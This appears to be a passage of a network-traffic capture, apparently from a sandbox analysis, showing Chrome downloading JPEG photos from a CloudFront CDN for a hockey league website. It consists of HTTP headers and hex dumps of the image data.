                                                                                                                          2025-01-13 21:01:22 UTC7013INData Raw: 79 3b 1e 12 3a 1b 3e ae 3f f9 5a 97 89 da 4b c2 d3 21 65 ac 9e 48 fa 32 5e a6 e5 ca e2 3d de 36 3c 8a 5c 31 4b 20 98 2f 8b 73 28 5c 90 00 18 1c 15 3a 09 62 c5 0b ca ef bc c5 ed 2d ad cb 97 3e 7a 80 4a 2b 25 ea c2 32 b4 19 c7 17 ec 1f a9 45 4c d2 73 52 47 14 42 3b d6 6a 60 04 8d 1e 16 29 e7 dc 32 2c 53 4e 7c 05 6f 92 04 6b 22 f9 13 f9 23 a2 9b 03 c8 a7 e5 4b 23 14 0f c4 0a f4 5d e7 39 15 fa 96 af 5c 38 f1 42 e1 ad 4f 66 04 8b 06 71 03 be 8c 8b 9b 82 82 f1 f9 84 24 61 a0 a1 69 eb 53 28 49 71 b1 33 7d 54 3c 16 12 e7 11 1b ca 1d 2d 97 35 10 63 8b e7 24 5c f2 d9 40 dd 59 e2 58 dd a5 72 2c ab f7 28 b8 b4 db fd 15 1f a8 37 29 79 37 59 8f 65 30 a9 af 98 46 14 b1 4b 6f 98 e0 02 cd 8b e6 61 31 66 05 14 06 09 5c d0 b6 c8 c3 60 2b bf 4c c5 d3 d5 a3 a5 15 65 86 33 96
                                                                                                                          Data Ascii: y;:>?ZK!eH2^=6<\1K /s(\:b->zJ+%2ELsRGB;j`)2,SN|ok"#K#]9\8BOfq$aiS(Iq3}T<-5c$\@YXr,(7)y7Ye0FKoa1f\`+Le3


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          142192.168.11.204997154.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:22 UTC648OUTGET /app/uploads/gthl/2024/11/15144558/0C9A0952-730x487.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:22 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 96174
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:23 GMT
                                                                                                                          Last-Modified: Fri, 15 Nov 2024 19:45:59 GMT
                                                                                                                          ETag: "7f8e9aed6e8c1b57e7c6d54a3d235971"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 65515d7b1028cd133489fb761d35fa06.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: LnmAZdBsx4Bxr3lMBvxcTy9F0hPNt2pWmimnYDbLmjQLemE5Fb2iDw==
                                                                                                                          2025-01-13 21:01:22 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 f0 00 f0 00 00 ff e1 39 09 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0a 00 0f 01 02 00 06 00 00 00 86 00 00 00 10 01 02 00 15 00 00 00 8c 00 00 00 1a 01 05 00 01 00 00 00 a2 00 00 00 1b 01 05 00 01 00 00 00 aa 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 20 00 00 00 b2 00 00 00 32 01 02 00 14 00 00 00 d2 00 00 00 3b 01 02 00 08 00 00 00 e6 00 00 00 98 82 02 00 09 00 00 00 ee 00 00 00 69 87 04 00 01 00 00 00 f8 00 00 00 64 03 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 56 00 00 f0 00 00 00 01 00 00 00 f0 00 00 00 01 00 00 00 41 64 6f 62 65 20 4c 69 67 68 74 72 6f 6f 6d 20 38 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 31 31 3a 30 37 20 31 31 3a 35
                                                                                                                          Data Ascii: JFIF9ExifII*(1 2;idCanonCanon EOS 5D Mark IVAdobe Lightroom 8.0 (Macintosh)2024:11:07 11:5
                                                                                                                          2025-01-13 21:01:22 UTC8819INData Raw: ca 18 c9 ad db 8f 64 e6 e1 27 6d bf 86 d9 47 e4 ec 65 6c b5 ad 50 b5 55 51 20 4f 76 3f 16 df 7e 1d 51 dc 07 1f 4d c8 96 2f e7 af 35 79 82 d7 cc b7 76 b6 1a bd f5 9c 10 24 41 61 b6 ba 9e 18 c3 15 e4 c7 84 6e ab 53 cb 2f c1 f4 34 e6 3e a4 8e 4f 38 79 bc 47 19 1e 61 d5 6a 46 e7 eb f7 5f f5 53 2e 6a b6 67 e4 1d 47 cd 37 56 d2 5e 6a 7a a5 e5 dd 9b b7 ee 45 dd cc d3 57 8e dc a3 0e cd c3 7a fc 79 8d 9f 1f 1e ce 56 9b 37 87 66 ad 3f d4 7c d7 e6 1b bd 3a 1d 26 df 8c f7 16 c6 54 b8 0f 1d 11 e2 66 e5 6f 3c 32 06 e7 1d d4 15 31 f2 e5 f1 fd bc a3 f2 f4 5c 8f ce 58 f3 48 3c 83 e6 1f 33 e9 3a ec f6 97 36 ca 91 5d 37 ab 72 f7 17 26 d6 38 62 8e be a4 f2 33 23 89 7e 12 a3 f9 b2 59 b1 47 85 1a 5c f2 e2 23 f1 fd 66 53 ab dd 7e 5d 79 e6 e2 69 63 d4 e3 8f 58 8f 8a 41 77 19 28
                                                                                                                          Data Ascii: d'mGelPUQ Ov?~QM/5yv$AanS/4>O8yGajF_S.jgG7V^jzEWzyV7f?|:&Tfo<21\XH<3:6]7r&8b3#~YG\#fS~]yicXAw(
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 58 7d 58 cb 59 1a 59 69 59 b8 5a 07 5a 56 5a a6 5a f5 5b 45 5b 95 5b e5 5c 35 5c 86 5c d6 5d 27 5d 78 5d c9 5e 1a 5e 6c 5e bd 5f 0f 5f 61 5f b3 60 05 60 57 60 aa 60 fc 61 4f 61 a2 61 f5 62 49 62 9c 62 f0 63 43 63 97 63 eb 64 40 64 94 64 e9 65 3d 65 92 65 e7 66 3d 66 92 66 e8 67 3d 67 93 67 e9 68 3f 68 96 68 ec 69 43 69 9a 69 f1 6a 48 6a 9f 6a f7 6b 4f 6b a7 6b ff 6c 57 6c af 6d 08 6d 60 6d b9 6e 12 6e 6b 6e c4 6f 1e 6f 78 6f d1 70 2b 70 86 70 e0 71 3a 71 95 71 f0 72 4b 72 a6 73 01 73 5d 73 b8 74 14 74 70 74 cc 75 28 75 85 75 e1 76 3e 76 9b 76 f8 77 56 77 b3 78 11 78 6e 78 cc 79 2a 79 89 79 e7 7a 46 7a a5 7b 04 7b 63 7b c2 7c 21 7c 81 7c e1 7d 41 7d a1 7e 01 7e 62 7e c2 7f 23 7f 84 7f e5 80 47 80 a8 81 0a 81 6b 81 cd 82 30 82 92 82 f4 83 57 83 ba 84 1d 84
                                                                                                                          Data Ascii: X}XYYiYZZVZZ[E[[\5\\]']x]^^l^__a_``W``aOaabIbbcCccd@dde=eef=ffg=ggh?hhiCiijHjjkOkklWlmm`mnnknooxop+ppq:qqrKrss]sttptu(uuv>vvwVwxxnxy*yyzFz{{c{|!||}A}~~b~#Gk0W
                                                                                                                          2025-01-13 21:01:22 UTC1024INData Raw: 1d 6e d2 68 f2 1f 95 19 9f b6 00 f3 02 dc a0 e3 19 03 bb cf f5 35 f3 b3 61 cc a2 d4 b1 3f 6e 29 ae 3f ee 8f 54 33 63 7d 4f fe 06 b6 9d ad 5b bc ae b7 12 46 c5 4c 8e bd a9 19 e6 93 25 57 3d 0a a2 e0 7f 7a be 64 b1 e2 55 1c 90 af 45 c3 5e 9e bf 8b 3d 4a 6d db 8b fd 7f f7 a1 ad a4 a4 f2 f0 dd 93 dd c9 3c cf 74 a2 47 2a c5 9b 07 bd 8e a3 d0 57 af c2 f4 eb f7 a3 71 54 a3 7f d8 f3 6b 32 7f f1 79 f5 25 b9 b5 86 18 e1 bb 89 64 8d e0 95 58 f3 c4 41 e5 3b 36 4e 3c 89 f1 af d3 f8 be 9f cf d1 e4 87 db fa 72 7c ad 16 4f 2f 34 64 72 9a 2d dd ce 97 75 ac e9 76 97 36 96 cc 93 cc f1 b2 a1 79 8e 3b d8 c6 31 cb 8c 8a fc be a7 4f 1c d0 c5 9e 69 c9 52 be 6a 3e df 99 f6 21 37 19 4a 09 a5 cb fc 4d 3d 0e 3e 25 39 17 96 93 c9 25 c1 ed f9 ad e7 0a bd a3 1f d2 1d 40 50 00 e5 f4 3d
                                                                                                                          Data Ascii: nh5a?n)?T3c}O[FL%W=zdUE^=Jm<tG*WqTk2y%dXA;6N<r|O/4dr-uv6y;1OiRj>!7JM=>%9%@P=
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 67 17 6f 15 c5 a4 2c 17 12 27 7c 93 ce 80 8d c9 dc 0d c7 8e d5 d6 17 27 b9 f4 ca bb b3 a7 b9 b7 bf bc b6 68 5a 0b 74 0c 3a 99 32 41 f9 15 22 bc b1 71 8c ae cc aa 31 ed b8 66 e6 d9 9a 6e 5b 51 29 dd a4 32 90 3c 76 c2 a8 00 6e 76 ae f2 cf 17 c1 a7 24 14 e1 3b 99 34 c8 f4 f4 bf 8a 0b 74 ea 60 56 e6 7c 8d f2 4b 60 e7 e5 53 e2 21 bb 75 5b 1b d5 d9 a4 fa 23 b4 0c 97 1a 95 d3 c7 cb ca 57 08 a3 1e 5b 0a e3 e6 2b b5 12 5f d8 ce 7d 0a cb 4c b6 92 ea cd 5d 5e 28 dc ac 92 be 10 67 72 4f a6 d5 b7 a8 94 b8 97 43 7d f6 1b 0b 4b 28 62 5b 18 e7 96 47 4f ed 04 57 01 47 31 dc 96 e5 3b 67 ad 66 59 5c 9d d1 37 59 15 e6 a1 a2 5b 4d 6f 14 f7 e1 5a 60 5a 3e 47 77 c8 04 82 41 cf 81 18 fb 79 d6 54 e4 ba 1b a8 ab 7b ac f0 d5 9c 32 ca 97 5d b1 88 84 25 91 a4 5c 91 9e 5d be fb 56 96
                                                                                                                          Data Ascii: go,'|'hZt:2A"q1fn[Q)2<vnv$;4t`V|K`S!u[#W[+_}L]^(grOC}K(b[GOWG1;gfY\7Y[MoZ`Z>GwAyT{2]%\]V
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 7e c8 f5 5b 73 a8 f1 ee 6c 47 73 2c d6 72 4f 6d a6 c8 71 28 54 8d 9c a9 2a 40 25 88 f3 c9 3f c6 bd be 5a f5 3a ed 24 5b e8 7d da 09 7f 22 cf f9 e0 c4 a3 c6 33 1e 3f 5b e7 4f 2a 1e c3 6a 0a df bc 56 cd 32 e9 03 3c e1 56 1e e8 60 31 b9 cf 4a 9e 5e 35 e8 89 48 92 71 7b 36 96 e9 06 a1 14 17 4c 40 e6 58 d7 ba 39 f7 c0 cf ea d4 dd 89 7a a2 5c 49 92 ef 53 2b 86 92 c9 08 ce e3 27 23 c3 c6 b4 b2 43 d1 96 d1 2b 49 79 25 b4 a8 d7 28 ce ea 02 f2 c2 c4 29 f1 f0 dc 74 ab e6 44 5a 23 82 df 52 65 06 e2 f6 e1 dc 8e f7 67 17 22 fd 32 7e 54 59 13 e9 3f c8 58 45 b1 89 fb 47 92 66 23 3f 19 1b fe 35 b5 2b f4 2a 32 b5 29 06 f4 66 91 cf ce d9 ac b3 45 27 6c 1a 85 1c 92 54 a0 49 da ed d6 80 8e 49 36 a0 29 cb 25 43 44 42 4d ea 02 64 92 80 90 4b bd 52 92 ac b4 b0 4f 1c b5 a4 42 47
                                                                                                                          Data Ascii: ~[slGs,rOmq(T*@%?Z:$[}"3?[O*jV2<V`1J^5Hq{6L@X9z\IS+'#C+Iy%()tDZ#Reg"2~TY?XEGf#?5+*2)fE'lTII6)%CDBMdKROBG
                                                                                                                          2025-01-13 21:01:22 UTC630INData Raw: de 3b 81 8a f9 b2 f0 bd 34 a6 f2 4a 3c b3 db 0d 56 74 94 62 f8 31 b8 a3 8c 38 5f 53 b6 91 34 f9 9f 99 bf ee 98 67 ef 5d 71 e0 c5 85 56 35 47 75 3c b3 fa d9 e7 0a 01 90 e3 71 9d ab 69 9b 91 ad 66 36 15 ab 38 49 1a 91 55 39 34 5a 46 c5 68 c3 43 fb 4c 55 33 43 5a 6a a0 67 6d 40 49 1c de b5 49 45 85 9b 6e b5 48 d0 9a 6a 10 89 a4 26 a0 22 2d bf 5a 02 58 9b 7a 10 b5 1b 92 6a 83 42 d9 49 35 48 5f 8d 71 42 96 63 14 04 e3 6a a2 89 a3 39 a8 0b 09 8a 01 e5 32 2a b2 10 f6 5e 95 05 9f 33 34 b2 dc 0e cd bb a5 76 29 e2 6b bc 8f 3c 7b 3d 8b 83 f4 91 a4 e8 d1 23 7c 7c b9 63 ea 6b e3 66 9e e9 36 7d 3c 71 db 1a 05 e4 9c f3 b1 1d 33 59 46 8a 77 52 76 56 f2 39 fd 15 26 8c e9 89 5c d2 31 ec 6e 3d ee dd 65 c6 33 d4 57 82 4a 99 fd 7f 4f 3d d8 d3 3b af 66 4a bf 96 8b b2 02 a6 6b
                                                                                                                          Data Ascii: ;4J<Vtb18_S4g]qV5Gu<qif68IU94ZFhCLU3CZjgm@IIEnHj&"-ZXzjBI5H_qBcj92*^34v)k<{=#||ckf6}<q3YFwRvV9&\1n=e3WJO=;fJk
                                                                                                                          2025-01-13 21:01:22 UTC2124INData Raw: d6 76 63 e7 5b b3 27 84 71 4c c2 7e 28 d4 a4 07 39 b8 61 f6 38 fe 15 f5 30 fd 08 f9 b9 be b6 66 5c 85 75 e9 bd 75 39 a2 1b 68 54 b8 d8 50 b6 5b b9 08 14 0c 50 85 36 8d 5b 7d a8 52 33 10 f2 14 16 75 9c 26 c3 4e d3 da e5 06 24 92 50 73 e8 bd 3f 1c d7 8f 51 cb a3 e8 69 15 47 71 ea 36 d3 c5 78 8b 7d 2a b1 2c b9 11 b0 af 9a b4 f9 2f a3 eb 4b 57 86 b9 63 3d 9b f1 bd de 8d c7 6f a7 df 0f 77 d3 2f d8 c6 a1 b6 08 e7 a7 df f8 d7 7c 98 1a 85 ae cf 2e 2d 4a 94 e8 ab c5 dc 41 c4 7e cd f8 fa f9 6d 2e 24 6b 09 e4 f7 98 92 5e f4 72 ab 6e 71 e5 be 46 d5 31 c6 19 21 4f b3 59 72 cf 1c ef d0 c0 e2 ee 33 fe b9 5e a6 a1 35 8c 16 6d 04 5c 8e d1 ee 64 f1 c9 35 a8 e3 db c2 38 e6 ce b2 25 c5 51 c3 49 c4 ac c5 82 46 bc 87 6d fa e2 bd b1 c2 92 e4 f9 f2 ca d9 db f0 09 e0 14 d2 d2 e7
                                                                                                                          Data Ascii: vc['qL~(9a80f\uu9hTP[P6[}R3u&N$Ps?QiGq6x}*,/KWc=ow/|.-JA~m.$k^rnqF1!OYr3^5m\d58%QIFm
                                                                                                                          2025-01-13 21:01:22 UTC1024INData Raw: 46 79 24 cf 3a f2 e0 2e f8 18 3e 35 d3 6f 54 4b f7 31 78 a1 b9 34 b9 17 a1 2c 06 3e b5 ca 5d 1f 67 c3 b0 ed d6 28 f7 44 56 4b c9 6d 12 f9 28 af 0c bb 3f a7 63 5b 60 8e f7 d9 95 c9 6b 5e 1e 66 0a 1a 6d 6e 59 17 1e 2a 39 16 be d2 a8 ac 71 a3 f9 8c 93 cd 93 53 9a fd 1f f5 7f d8 e7 ef a6 b8 bd d6 35 e8 e7 42 56 2b d6 05 d5 72 54 73 12 09 fb 1a 4b 12 9a 74 b9 67 0c 1e 2b 9b 4b 3c 4d c9 b8 c6 b8 e0 9a 6e 17 9e 6b 68 fd d9 e5 77 9d 4e 03 db b2 04 c9 c6 e4 fd fe 55 e5 86 89 da 76 7e 87 57 fb 59 0f 2e 50 d8 ed ae 1d a7 da 3a ae 15 b0 6b 08 f5 8b 09 b9 55 ed b4 01 1b 60 e4 67 b3 52 7f 7d 7b 27 fe ac bf 03 e0 e3 e3 43 8e 5f fd cf 31 d0 23 32 42 f6 f1 82 cc b3 b2 a8 f9 d7 97 55 1d d8 d5 1f 57 c0 35 11 d3 eb 72 6f 74 9a 7f a1 d3 9e 13 be 54 e6 91 e2 8f d0 e4 fe e1 5e
                                                                                                                          Data Ascii: Fy$:.>5oTK1x4,>]g(DVKm(?c[`k^fmnY*9qS5BV+rTsKtg+K<MnkhwNUv~WY.P:kU`gR}{'C_1#2BUW5rotT^
                                                                                                                          2025-01-13 21:01:22 UTC15990INData Raw: b9 33 1a cd 44 5a 51 89 c9 49 ad 13 d1 bd 2b dd b0 f9 ef 21 4a 7d 69 da 27 8d 8e 63 3e 75 a5 03 12 c8 76 7e c8 ac 23 61 75 ac ca 09 78 d8 c3 0e 46 ca 30 09 23 f0 ae 1a 99 55 44 c4 39 e4 ec e6 90 c9 23 31 af 29 d2 ca 3a 94 dd 8d 8d c4 99 c0 58 d8 fe 15 a8 ab 68 cb 7c 1f 3c 16 2c c5 bc 49 cd 7d d4 7c c1 64 d6 81 13 1d e8 07 45 d6 84 14 a6 80 51 9c 2e 68 51 92 1c b5 00 d0 77 a0 25 0d 81 40 46 a7 2d 9a 02 4b 7b 69 2e a4 e5 45 ce f4 07 49 a7 70 9b cc 54 b8 26 a6 d2 59 d4 cd c2 02 4b 70 a6 3f d1 5f c0 56 94 4b 66 75 cf 07 72 1c 84 c5 47 12 c5 94 a4 d0 a5 b7 39 00 d7 09 c0 f4 e3 99 24 28 f1 1c 30 c5 79 67 1a 3d d8 e5 65 f8 9b a5 71 67 a5 17 61 7a 26 1a 2c 09 30 2b 69 9c a4 86 49 74 00 eb 5d 51 c6 48 a5 35 e0 1e 35 b4 8e 4c ae 6f 87 9d 6d 23 9b 63 4e a0 3c eb 69
                                                                                                                          Data Ascii: 3DZQI+!J}i'c>uv~#auxF0#UD9#1):Xh|<,I}|dEQ.hQw%@F-K{i.EIpT&YKp?_VKfurG9$(0yg=eqgaz&,0+iIt]QH55Lom#cN<i


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          143192.168.11.204997354.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:22 UTC413OUTGET /app/uploads/gthl/2024/11/14092335/0C9A0893-730x487.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:22 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 78473
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:23 GMT
                                                                                                                          Last-Modified: Thu, 14 Nov 2024 14:23:37 GMT
                                                                                                                          ETag: "680a0fdad729fec37c86c09d7b72256c"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 e67eec39bafe7d4b59266632bc2a9886.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: IcWMvS-9I_c3H56ukat6c8QPXj4hmugvAYzYYTSXZhIva8VshjJjGQ==
                                                                                                                          2025-01-13 21:01:22 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 f0 00 f0 00 00 ff e1 32 76 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0a 00 0f 01 02 00 06 00 00 00 86 00 00 00 10 01 02 00 15 00 00 00 8c 00 00 00 1a 01 05 00 01 00 00 00 a2 00 00 00 1b 01 05 00 01 00 00 00 aa 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 20 00 00 00 b2 00 00 00 32 01 02 00 14 00 00 00 d2 00 00 00 3b 01 02 00 08 00 00 00 e6 00 00 00 98 82 02 00 09 00 00 00 ee 00 00 00 69 87 04 00 01 00 00 00 f8 00 00 00 64 03 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 56 00 00 f0 00 00 00 01 00 00 00 f0 00 00 00 01 00 00 00 41 64 6f 62 65 20 4c 69 67 68 74 72 6f 6f 6d 20 38 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 31 31 3a 30 37 20 31 31 3a 35
                                                                                                                          Data Ascii: JFIF2vExifII*(1 2;idCanonCanon EOS 5D Mark IVAdobe Lightroom 8.0 (Macintosh)2024:11:07 11:5
                                                                                                                          2025-01-13 21:01:22 UTC1114INData Raw: b9 ca 38 ca b7 cb 36 cb b6 cc 35 cc b5 cd 35 cd b5 ce 36 ce b6 cf 37 cf b8 d0 39 d0 ba d1 3c d1 be d2 3f d2 c1 d3 44 d3 c6 d4 49 d4 cb d5 4e d5 d1 d6 55 d6 d8 d7 5c d7 e0 d8 64 d8 e8 d9 6c d9 f1 da 76 da fb db 80 dc 05 dc 8a dd 10 dd 96 de 1c de a2 df 29 df af e0 36 e0 bd e1 44 e1 cc e2 53 e2 db e3 63 e3 eb e4 73 e4 fc e5 84 e6 0d e6 96 e7 1f e7 a9 e8 32 e8 bc e9 46 e9 d0 ea 5b ea e5 eb 70 eb fb ec 86 ed 11 ed 9c ee 28 ee b4 ef 40 ef cc f0 58 f0 e5 f1 72 f1 ff f2 8c f3 19 f3 a7 f4 34 f4 c2 f5 50 f5 de f6 6d f6 fb f7 8a f8 19 f8 a8 f9 38 f9 c7 fa 57 fa e7 fb 77 fc 07 fc 98 fd 29 fd ba fe 4b fe dc ff 6d ff ff ff ed 00 7e 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 62 1c 01 5a 00 03 1b 25 47 1c 02 00 00 02 00 04 1c 02 37 00 08
                                                                                                                          Data Ascii: 8655679<?DINU\dlv)6DScs2F[p(@Xr4Pm8Ww)Km~Photoshop 3.08BIMbZ%G7
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 0a 20 20 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 32 34 2d 31 31 2d 30 37 54 31 31 3a 35 31 3a 31 33 2d 30 35 3a 30 30 22 0a 20 20 20 78 6d 70 3a 43 72 65 61 74 65 44 61 74 65 3d 22 32 30 32 34 2d 31 31 2d 30 32 54 31 32 3a 33 37 3a 30 31 2e 30 30 2d 30 35 3a 30 30 22 0a 20 20 20 78 6d 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 4c 69 67 68 74 72 6f 6f 6d 20 38 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 0a 20 20 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 34 2d 31 31 2d 30 37 54 31 31 3a 35 31 3a 31 33 2d 30 35 3a 30 30 22 0a 20 20 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 6a 70 65 67 22 0a 20 20 20 61 75 78 3a 53 65 72 69 61 6c 4e 75 6d 62 65 72 3d 22 31 39 32 31 35 36 30 30 30 31 32
                                                                                                                          Data Ascii: xmp:ModifyDate="2024-11-07T11:51:13-05:00" xmp:CreateDate="2024-11-02T12:37:01.00-05:00" xmp:CreatorTool="Adobe Lightroom 8.0 (Macintosh)" xmp:MetadataDate="2024-11-07T11:51:13-05:00" dc:format="image/jpeg" aux:SerialNumber="19215600012
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 14 b4 c3 3d dd ba d6 93 60 54 4b de 6e ab 72 33 dc f4 d2 6a d5 74 9d c7 09 07 64 9d a9 6b d0 cb 72 13 4b 32 79 f2 7d 20 26 bc 9b 7a a5 fe d5 ba ab a4 b4 ae 7f 77 e4 a9 dc 1b 5d ec 9d e6 a2 6d e8 9e 6c 6c ae 93 6f 30 f7 d5 d1 b3 df a4 64 94 90 b5 ea 37 77 5e 42 ba 49 4c 85 c3 b6 2a c8 ce ca 5f ef 24 8b b3 5e ed 95 a9 b2 4e 7d 98 44 b4 29 ac 43 4a de 92 d3 d8 7d 92 69 36 0d 8f 68 56 e4 67 61 cb b9 ba d4 4b 56 9c 34 3e 9c 07 f0 af 4f 04 f9 9e 6e 6f 4d 53 da bd af 10 98 7c 0d 9a ba 16 3f dd 2e d5 63 3b ac 6b bf 49 87 77 2c 95 ba 34 51 b2 98 65 16 6e fb 2f 3f 6f 87 da fc 4b 72 50 62 04 31 ce ee e9 e4 b1 8f 8a eb 77 63 31 5f 1b 73 97 db 45 6a 4d c5 69 78 26 e3 5e 4b 32 96 a8 b1 5c 32 09 43 9e e8 c5 ce ab d3 c7 c9 63 c1 cb c5 32 aa 2a 9c 31 ad 68 b5 c6 9f 82 ef
                                                                                                                          Data Ascii: =`TKnr3jtdkrK2y} &zw]mllo0d7w^BIL*_$^N}D)CJ}i6hVgaKV4>OnoMS|?.c;kIw,4Qen/?oKrPb1wc1_sEjMix&^K2\2Cc2*1h
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 54 86 fd 9d af cd c5 6d 0d 70 aa be ae 67 92 6a a6 cc 96 a5 f0 6b 2c 4f 23 ed 37 55 0d 42 d3 d7 53 d4 03 d9 48 33 74 4d ab d3 3d 84 81 23 75 ea 95 34 8e fa 46 b9 d9 da fb 8e 8b 36 55 55 d4 4c 24 96 4b 6c 2c 17 37 44 09 4e a5 04 67 bf 44 1e a5 b9 79 44 d2 44 9b a2 83 63 aa 27 92 5a e8 a9 31 69 0a 26 83 70 d6 e8 53 74 40 a3 74 53 9a 49 40 f0 4d d0 15 a2 e8 97 7f 63 ac 8b 0b 45 f1 64 bf d9 40 c9 1a 33 dd 12 27 32 42 1a 05 c6 c9 a5 74 71 c9 7d 0a d9 c4 6a b9 55 8c 07 14 1b e2 6f f2 5e 1e 5f a9 b5 4b 57 34 11 a8 68 56 22 8c c4 12 a9 3d e4 a3 b9 70 a8 b6 05 4e 3f 84 2f 8b cd 3e 7a fa dc 5f 44 5a ac c6 aa 26 2f fe 6f 9b ee 95 a9 ed 8c bd 39 0b 87 b4 98 f8 95 b8 90 38 85 e3 7a 8a 1d 30 b9 72 22 65 00 b3 dd 65 8a b2 8b 0f c7 3a 2c e9 a3 1d ad 53 7c d6 be ca 95 59
                                                                                                                          Data Ascii: Tmpgjk,O#7UBSH3tM=#u4F6UUL$Kl,7DNgDyDDc'Z1i&pSt@tSI@McEd@3'2Btq}jUo^_KW4hV"=pN?/>z_DZ&/o98z0r"ee:,S|Y
                                                                                                                          2025-01-13 21:01:22 UTC5394INData Raw: 7b a2 50 0d ae 8c ee a4 c6 2f 50 cf 35 f1 f1 7d 9b 1b 28 23 1d 93 7c 95 5d 41 04 43 a2 6d 35 0e 10 02 56 a5 4d 08 21 b0 57 69 a0 fb 23 75 65 67 42 c5 11 27 51 b2 bb 16 54 2c fa 54 22 df 58 29 b1 d5 29 db 6a 76 7d d0 b8 3a d3 ac ac 4a c9 71 ef f9 b8 a9 95 49 ed cd 80 d4 2e 6e 92 1f 38 b8 45 a5 60 f6 21 4a 44 b7 10 ca 6c ce 36 68 17 2b 1f 7f 0e 8e 7d 8f 62 3e b9 54 e2 0f 74 68 df 25 f5 b8 38 fb 71 7c ce 7e 4e ec 93 f8 2f 09 75 6d 51 a9 92 fd 8c 5a eb cc ae 7d 57 27 6e 3a 9f 76 fa 5e 3e eb ba fa 43 82 da 07 03 50 58 00 3d 62 a7 61 e0 bc d7 f2 a3 ef fc 33 f3 b2 ff 00 8f f2 cf d5 8f 6a ef 35 f3 b2 f6 fe 87 c5 f4 c4 75 cd d9 eb db 63 65 43 6d 72 a2 bd 64 d0 70 0a a5 69 7d 1d b7 37 16 51 f8 66 3f f2 95 e9 e9 3f 32 3e 27 f5 0d d7 41 9f fc 7f 97 68 2b ee e3 e9 fc
                                                                                                                          Data Ascii: {P/P5}(#|]ACm5VM!Wi#uegB'QT,T"X))jv}:JqI.n8E`!JDl6h+}b>Tth%8q|~N/umQZ}W'n:v^>CPX=ba3j5uceCmrdpi}7Qf??2>'Ah+
